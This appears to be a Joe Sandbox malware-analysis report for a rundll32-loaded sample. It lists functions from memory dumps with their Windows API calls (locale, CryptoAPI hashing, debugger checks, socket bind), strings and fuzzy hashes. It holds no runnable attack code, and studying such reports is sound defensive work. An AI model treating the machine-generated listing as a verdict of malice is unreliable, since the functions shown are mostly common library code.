Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
String ID:
API String ID: 3016261861-0
Opcode ID: 35bf2a8f0a1af36072bb716302f0ae6ef26cdfbd75791ce0ede45b1cb5629d63
Instruction ID: 966a756477ccb92cdad4dfa397f15af3ff961bf8cc71bd26963a5a910d7dd1c7
Opcode Fuzzy Hash: 35bf2a8f0a1af36072bb716302f0ae6ef26cdfbd75791ce0ede45b1cb5629d63
Instruction Fuzzy Hash: 76419F741083809FE7018B65C845B9BBFE4EF8A704F004958F5D8A7292C365E50ADB96

Function 6D06B929 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,6D06BC3B,00000002,00000000,?,?,?,6D06BC3B,?,00000000), ref: 6D06B9C2
GetLocaleInfoW.KERNEL32(00000000,20001004,6D06BC3B,00000002,00000000,?,?,?,6D06BC3B,?,00000000), ref: 6D06B9EB
GetACP.KERNEL32(?,?,6D06BC3B,?,00000000), ref: 6D06BA00

Strings

OCP, xrefs: 6D06B97D
ACP, xrefs: 6D06B947

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: f372001d4a00e800baa9c49ace323828e2c11f618e2fc1b568ca167f99426ebf
Instruction ID: 93a088ec4c9e8fedda46585b818558bde270e7fa8dcd7420d21831714db26814
Opcode Fuzzy Hash: f372001d4a00e800baa9c49ace323828e2c11f618e2fc1b568ca167f99426ebf
Instruction Fuzzy Hash: C721C8B2654182A6F7258F29C900BAB73F6FF46B64B428524F915DB209E772DD40C370

Function 6D047130 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34encryptionCOMMON

Download Yara Rule

APIs

CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 6D04714C
CryptGetHashParam.ADVAPI32(00000020,00000002,?,?,00000000), ref: 6D047169
CryptDestroyHash.ADVAPI32(00000020), ref: 6D047177
CryptReleaseContext.ADVAPI32(00000020,00000000), ref: 6D047187

Strings

, xrefs: 6D047152

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Crypt$Hash$Param$ContextDestroyRelease
String ID:
API String ID: 2110207923-3916222277
Opcode ID: 64c8c07c2c8fb934fc15918475c17f7338d63e86438f59d8475ebf0017156a24
Instruction ID: feb3e536e05071ef605541f9eeb558c43168e2a9b805c5181dde37c0f1f9b7b7
Opcode Fuzzy Hash: 64c8c07c2c8fb934fc15918475c17f7338d63e86438f59d8475ebf0017156a24
Instruction Fuzzy Hash: 1DF06770208312EBEB208F10CD09F5A7BF8EB49B10F008818F689E7190C7B0E804CBA2

Function 6D031CB0 Relevance: 8.1, Strings: 6, Instructions: 585COMMON

Download Yara Rule

Strings

file, xrefs: 6D031FDF
%.*s%%25%s], xrefs: 6D032106
file://%s%s%s, xrefs: 6D03200C
%25, xrefs: 6D0321C3, 6D0321DB
%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s, xrefs: 6D032331
https, xrefs: 6D032054, 6D03205F

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: %.*s%%25%s]$%25$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
API String ID: 0-4261736843
Opcode ID: 6cf2b8200566ac057b63cfc185c422da2bc13b2007d06a8509b51c0de7b4dd44
Instruction ID: 5cdd01db4b8aa1775015dc42cd5b9c418dce3f00c25b972218ed69ef2fe1269d
Opcode Fuzzy Hash: 6cf2b8200566ac057b63cfc185c422da2bc13b2007d06a8509b51c0de7b4dd44
Instruction Fuzzy Hash: 9212E0B5A08353AFFB10CF24C840B6AB7E4BF89354F450929E9558B391D732E914CBD2

Function 04EE0286 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 761COMMONLIBRARYCODE

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 04EE035E

Part of subcall function 04ED4EC7: __call_reportfault.LIBCMT ref: 04ED4ED4

_strcpy_s.LIBCMT ref: 04EE0393
_strcpy_s.LIBCMT ref: 04EE03B0

Strings

T, xrefs: 04EE042F

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _strcpy_s$__call_reportfault__invoke_watson
String ID: T
API String ID: 2863396484-3187964512
Opcode ID: ff093b41e1ce13d86105b4c2306c29e94f89965ce5a4dbc28058ac2a49ec967a
Instruction ID: 6a4f78f07b5c03dc51841ea23f4cdc085848fc19d15194ecc7e38e7135d61e7e
Opcode Fuzzy Hash: ff093b41e1ce13d86105b4c2306c29e94f89965ce5a4dbc28058ac2a49ec967a
Instruction Fuzzy Hash: A4528F71E0066ACFDF24CFA9C4402FEB7B1FF44318F54916AD846AB241E7B4AA45CB94

Function 6D06BB05 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6D06BC0D
IsValidCodePage.KERNEL32(00000000), ref: 6D06BC4B
IsValidLocale.KERNEL32(?,00000001), ref: 6D06BC5E
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6D06BCA6
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6D06BCC1

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 4ff876cf6053c9585de6a888c544edba314253258c02ff786402cbb04a7d8710
Instruction ID: 9a55b447c23371d65229fb49dc1b9955b5fe268f2946c6bf8c8a8554850b2460
Opcode Fuzzy Hash: 4ff876cf6053c9585de6a888c544edba314253258c02ff786402cbb04a7d8710
Instruction Fuzzy Hash: 88513DB1904256AAFF00DFA5CC40BBE77B8BF49714F454469B910EB190EBB1DA41CB71

Function 04EB21EB Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 04EB4070
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04EB4085
UnhandledExceptionFilter.KERNEL32(04EC9380), ref: 04EB4090
GetCurrentProcess.KERNEL32(C0000409), ref: 04EB40AC
TerminateProcess.KERNEL32(00000000), ref: 04EB40B3

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 72fd526bdf0cb3c673509240a24e63f2b999b3e2d9e90a431b9637c95fd5fac0
Instruction ID: fc3e81706ef3ce1c56a2ab8c3bfa823cf67ca8839669be70bf2d9f6e8b9eff7a
Opcode Fuzzy Hash: 72fd526bdf0cb3c673509240a24e63f2b999b3e2d9e90a431b9637c95fd5fac0
Instruction Fuzzy Hash: 5C21B0B6910304DFD710DF7AE1496883BB0FB88306F50516AE5488B389E7BA5E83CF85

Function 6D06B190 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7

GetACP.KERNEL32(?,?,?,?,?,?,6D061671,?,?,?,00000055,?,-00000050,?,?,00000002), ref: 6D06B24F
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D061671,?,?,?,00000055,?,-00000050,?,?), ref: 6D06B286

Part of subcall function 6D0633BD: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,-00000050,?,?,?,6D0621E7,?,20001004,00000000,00000002,?,?,6D0617D9,?,?), ref: 6D0633DC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D06B3E9

Strings

utf8, xrefs: 6D06B358

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$CodeDisableInfoLocalePagePrintScreen@@Valid
String ID: utf8
API String ID: 1994587716-905460609
Opcode ID: c9323aea24a9b9b1e7112ee61bee199bf48e23837bbe3eed7469c47f27091560
Instruction ID: ff76b471e7b93c89a24fbc827338eb1f687f14ee0e88b3cabaa47d394116025d
Opcode Fuzzy Hash: c9323aea24a9b9b1e7112ee61bee199bf48e23837bbe3eed7469c47f27091560
Instruction Fuzzy Hash: 017106B16086A3AAFB15EF75CC41BBA73E8EF45704F11442AFA25DB180EB74E5408771

Function 6D0547F0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f60daeb8ecbfcdb1d20b3ad555608b560b613ff68668e2d3fa8b828c549c6f2d
Instruction ID: 5fd27eca7eaab769019696f22ee764be3aefdd60a0c4be126a6e4bab36dc800a
Opcode Fuzzy Hash: f60daeb8ecbfcdb1d20b3ad555608b560b613ff68668e2d3fa8b828c549c6f2d
Instruction Fuzzy Hash: 1B025F71E00219ABEB14CFA9D9907EEBBF5FF88314F258269D915A7340D731A911CB90

Function 6D049B8A Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6D049B96
IsDebuggerPresent.KERNEL32 ref: 6D049C62
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D049C7B
UnhandledExceptionFilter.KERNEL32(?), ref: 6D049C85

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 1630eae5fe3a0533d9250b9073e5501a23267489ea9550d2c9c95cab525492c0
Instruction ID: 11213f81092ebecd2bc4505c88364f63c6aa7d93e475a629af27d1e33f162450
Opcode Fuzzy Hash: 1630eae5fe3a0533d9250b9073e5501a23267489ea9550d2c9c95cab525492c0
Instruction Fuzzy Hash: CC31FBB5D05229DBEF10DFA5D949BCDBBF4BF08304F1081AAE50DAB240EB719A858F45

Function 6D0449E0 Relevance: 6.0, APIs: 4, Instructions: 34encryptionCOMMON

Download Yara Rule

APIs

CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 6D0449FC
CryptGetHashParam.ADVAPI32(00000010,00000002,?,?,00000000), ref: 6D044A19
CryptDestroyHash.ADVAPI32(00000010), ref: 6D044A27
CryptReleaseContext.ADVAPI32(00000010,00000000), ref: 6D044A37

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Crypt$Hash$Param$ContextDestroyRelease
String ID:
API String ID: 2110207923-0
Opcode ID: c0a8cf70fe8c7e685cff79b3c185aaa0fbbbfd4458071659ab7b9d7cfc9ae14b
Instruction ID: 0e1baaf00ba15e523428729945c0ec367c91eaa408b356ca0951417d54951e82
Opcode Fuzzy Hash: c0a8cf70fe8c7e685cff79b3c185aaa0fbbbfd4458071659ab7b9d7cfc9ae14b
Instruction Fuzzy Hash: 27F01770209312FBFB208F10CD09F9A7BF8EB49B11F108818F685E6190D7B1E8149BA5

Function 6D01B590 Relevance: 5.5, Strings: 4, Instructions: 515COMMON

Download Yara Rule

Strings

GMT, xrefs: 6D01B74C, 6D01B757
%02d:%02d:%02d%n, xrefs: 6D01B7C5
%02d:%02d%n, xrefs: 6D01B7F7
%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz], xrefs: 6D01B665

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$GMT
API String ID: 0-988243589
Opcode ID: 03392f8f2e9cde61c7094af7b32d705c5d2b345fc9206884fa078ef871cc8c66
Instruction ID: 8eb94db047df7a900f7a63586b2a535b1953894f22f12bb836d94342751ca2ac
Opcode Fuzzy Hash: 03392f8f2e9cde61c7094af7b32d705c5d2b345fc9206884fa078ef871cc8c66
Instruction Fuzzy Hash: 7D02B17190C3068FE714DEA8DC8076AB7E5AB86324F544B2EF5A8C73D0E770D9458B92

Function 6D02EF49 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000030,?), ref: 6D02F0BB
WSAGetLastError.WS2_32(?,00000100), ref: 6D02F0CF

Strings

bind() failed; %s, xrefs: 6D02F0DC

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLastbind
String ID: bind() failed; %s
API String ID: 2328862993-1141498939
Opcode ID: 8f440b23df1debec614e0701c700681ba56f65faedc1aa5e3e1d3f2db0104149
Instruction ID: d2a073a484dbd37ed1ad73aa2996977d2cb3cd88b226ac357883947ba09addf2
Opcode Fuzzy Hash: 8f440b23df1debec614e0701c700681ba56f65faedc1aa5e3e1d3f2db0104149
Instruction Fuzzy Hash: 0551D1316083868BFB219F35CC95BDFBFF8AF46340F840429E989DB282D77694448B52

Function 6D02F180 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000030,?), ref: 6D02F2CF
WSAGetLastError.WS2_32(?,00000100), ref: 6D02F2E3

Strings

bind() failed; %s, xrefs: 6D02F2F0

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLastbind
String ID: bind() failed; %s
API String ID: 2328862993-1141498939
Opcode ID: 4eba7cd91ceb6437b7b0dc6b2c8715cb31253e7cc06d8cc441f70242318f128e
Instruction ID: 46d2cbc49eed93e03226d79c74f54b13a9fa32622752eaee0a700eaf21d30161
Opcode Fuzzy Hash: 4eba7cd91ceb6437b7b0dc6b2c8715cb31253e7cc06d8cc441f70242318f128e
Instruction Fuzzy Hash: 9251B1705083029FFB21CF25C884BAABBF8FF46349F044469E9498B281D775E544CBA2

Function 6D06B5AD Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D06B601
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D06B64B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D06B711

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 8503efd650a7464e0bfdac62c7f8fffcbb926dad0f1a9b97cbe76ce9ac6e0ac6
Instruction ID: a08c2e5ade2f992f4f29e51dd99637e416a7c7d73c6fb0c8bf062240d472d02a
Opcode Fuzzy Hash: 8503efd650a7464e0bfdac62c7f8fffcbb926dad0f1a9b97cbe76ce9ac6e0ac6
Instruction Fuzzy Hash: 4061AEB15582579BFB198F28C892BBAB3F8FF05354F00406AFA19C6584EB74D941CB60

Function 6D04FADC Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D04FBD4
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D04FBDE
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D04FBEB

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 355fe7811920caa0ef4919b51921aef3cc8fd00094e75d91e73977db936fd775
Instruction ID: f3516ac0939661263f4c6e9ad82ffc6d8c5e10105b01b92a4a198e0a1ab51d5f
Opcode Fuzzy Hash: 355fe7811920caa0ef4919b51921aef3cc8fd00094e75d91e73977db936fd775
Instruction Fuzzy Hash: 8A31C874901229DBDB21DF64D988B8DBBF8BF08314F5081EAE51CA7290EB709F858F54

Function 6D044970 Relevance: 4.5, APIs: 3, Instructions: 28encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 6D044981
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 6D04499A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D0449A7

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Crypt$Context$AcquireCreateHashRelease
String ID:
API String ID: 4045725610-0
Opcode ID: 9a52e9fcf8d4a8aac55e9bb0680f4552279b78c8bbe3b51bf6bb36771b7b6cc4
Instruction ID: 06b51b2f638f14a64f263fac7d7ec52accaeecbcd07b8b35adba9a08343e6194
Opcode Fuzzy Hash: 9a52e9fcf8d4a8aac55e9bb0680f4552279b78c8bbe3b51bf6bb36771b7b6cc4
Instruction Fuzzy Hash: 39E01A35248221BAFB205F25EC05FAA37F8AB06B50F104425B740FA1D4D7E2EC419A98

Function 6D02C120 Relevance: 3.0, APIs: 2, Instructions: 35networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(6D02C36A), ref: 6D02C14D
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D02C185

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CurrentProcesshtons
String ID:
API String ID: 2530476045-0
Opcode ID: 2d69479197c51e631a99975ec2200ef8baf15afb12a0f1b4b559da7c3f623325
Instruction ID: 30ee2e041e7c234e2c983a46c8d0fad86922c1ef897a403c072886eafa5512cf
Opcode Fuzzy Hash: 2d69479197c51e631a99975ec2200ef8baf15afb12a0f1b4b559da7c3f623325
Instruction Fuzzy Hash: 03015A795183908BCB408F69C080796B7F4FF5A310F09D68AEC889F356D370D590C766

Function 6D0633BD Relevance: 3.0, APIs: 2, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,-00000050,?,?,?,6D0621E7,?,20001004,00000000,00000002,?,?,6D0617D9,?,?), ref: 6D0633DC
GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6D0621E7,?,20001004,00000000,00000002,?,?,6D0617D9), ref: 6D0633F1

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
